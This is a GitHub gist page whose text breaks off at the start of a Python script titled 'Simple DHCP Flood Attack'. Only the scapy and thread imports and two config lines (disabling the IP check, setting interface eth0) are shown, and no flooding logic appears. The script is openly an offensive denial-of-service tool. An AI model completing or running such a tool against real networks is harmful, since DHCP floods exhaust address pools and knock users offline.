Skip to content

Instantly share code, notes, and snippets.

View imthoe's full-sized avatar
🖤
see you space cowboy

imthoe

🖤
see you space cowboy
View GitHub Profile
@imthoe
imthoe / dhcp-flood.py
Created May 19, 2020 17:55
Simple DHCP Flood Attack
#!/usr/bin/env python
from scapy.all import *
from time import sleep
from thread import start_new_thread
# config
conf.checkIPaddr = False
interface = 'eth0'